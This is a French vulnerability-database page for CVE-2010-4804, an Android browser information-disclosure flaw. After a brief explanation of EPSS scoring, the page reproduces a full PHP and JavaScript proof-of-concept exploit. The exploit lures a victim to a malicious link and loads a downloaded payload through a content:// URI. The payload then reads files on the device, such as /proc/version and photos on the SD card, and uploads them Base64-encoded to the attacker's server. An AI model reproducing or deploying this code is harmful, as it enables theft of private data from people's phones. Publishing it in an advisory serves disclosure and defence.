CVE-2010-4804 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

<?php /* * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities * Bugtraq ID: 48256 * CVE: CVE-2010-4804 * Affected: Android < 2.3.4 * Author: Thomas Cannon * Discovered: 18-Nov-2010 * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ * * Filename: poc.php * Instructions: Specify files you want to upload in filenames array. Host this php file * on a server and visit it using the Android Browser. Some builds of Android * may require adjustments to the script, for example when a German build was * tested it downloaded the payload as .htm instead of .html, even though .html * was specified. * * Tested on: HTC Desire (UK Version) with Android 2.2 */ // List of the files on the device that we want to upload to our server $filenames = array("/proc/version","/sdcard/img.jpg"); // Determine the full URL of this script $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; // Stage 0: Display introduction text and a link to start the PoC. function stage0($scripturl) { echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the // context of the local device - this is the vulnerability. function stage1($scripturl) { echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">"; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> <html> <body> <script language='javascript'> var filenames = Array('<?php echo implode("','",$filenames); ?>'); var filecontents = new Array(); function processBinary(xmlhttp) { data = xmlhttp.responseText; r = ''; size = data.length; for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff); return r; } function getFiles(filenames) { for (var filename in filenames) { filename = filenames[filename]; xhr = new XMLHttpRequest(); xhr.open('GET', filename, false); xhr.overrideMimeType('text/plain; charset=x-user-defined'); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } } xhr.send(); } } function addField(form, name, value) { var fe = document.createElement('input'); fe.setAttribute('type', 'hidden'); fe.setAttribute('name', name); fe.setAttribute('value', value); form.appendChild(fe); } function uploadFiles(filecontents) { var form = document.createElement('form'); form.setAttribute('method', 'POST'); form.setAttribute('enctype', 'multipart/form-data'); form.setAttribute('action', '<?=$scripturl?>?stage=3'); var i = 0; for (var filename in filecontents) { addField(form, 'filename'+i, btoa(filename)); addField(form, 'data'+i, filecontents[filename]); i += 1; } document.body.appendChild(form); form.submit(); } getFiles(filenames); uploadFiles(filecontents); </script> </body> </html> <?php } // Stage 3: Read the file names and contents sent by the payload and write to a file on the server. function stage3() { $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!"); fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); fclose($fp); echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!"; } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; default: stage0($scripturl); break; } ?>